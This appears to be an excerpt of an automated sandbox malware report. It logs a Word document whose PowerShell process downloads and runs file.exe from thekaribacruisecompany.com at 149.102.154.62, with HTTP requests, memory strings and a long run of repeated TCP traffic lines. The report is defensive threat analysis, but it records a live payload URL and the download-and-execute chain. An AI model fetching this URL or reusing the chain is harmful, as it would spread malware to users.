Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49171 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: global trafficTCP traffic: 192.168.2.22:49172 -> 149.102.154.62:443
Source: Joe Sandbox ViewASN Name: COGENT-174US COGENT-174US
Source: Joe Sandbox ViewJA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global trafficHTTP traffic detected: GET /file.exe HTTP/1.1Host: thekaribacruisecompany.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: global trafficHTTP traffic detected: GET /file.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thekaribacruisecompany.comConnection: Keep-Alive
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49172
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 49172 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.c
Source: powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exe
Source: powershell.exe, 0000000C.00000002.926461141.00000000035AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exePE
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.959457009.000000000385C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: httPs://thekaribacruisecompany.com/file.exePEQ
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B3A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: file.exe, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: file.exe, 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000009.00000000.921928467.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000000.947049391.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000010.00000002.1283348828.000000000040A000.00000004.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000000.1014911809.000000000040A000.00000008.00000001.01000000.00000006.sdmp, file.exe, 00000015.00000002.1283424107.000000000040A000.00000004.00000001.01000000.00000006.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s.symcd.com06
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/Yg
Source: powershell.exe, 0000000C.00000002.925602681.00000000001B7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/cps0%
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000036DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://d.symcb.com/rpa0.
Source: powershell.exe, 00000006.00000002.919745005.000000001B388000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B39E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.911999906.00000000002DA000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B37C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B391000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000006.00000002.912596165.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://thekaribacruisecompany.com
Source: powershell.exe, 00000006.00000002.912596165.00000000035BC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.919745005.000000001B35A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://thekaribacruisecompany.com/file.exe
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D69C60B5-B29E-4F37-A352-937B9DD503EB}.tmpJump to behavior
Source: unknownDNS traffic detected: queries for: thekaribacruisecompany.com
Source: global trafficHTTP traffic detected: GET /file.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: thekaribacruisecompany.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /file.exe HTTP/1.1Host: thekaribacruisecompany.comConnection: Keep-Alive
Source: unknownHTTPS traffic detected: 149.102.154.62:443 -> 192.168.2.22:49171 version: TLS 1.2
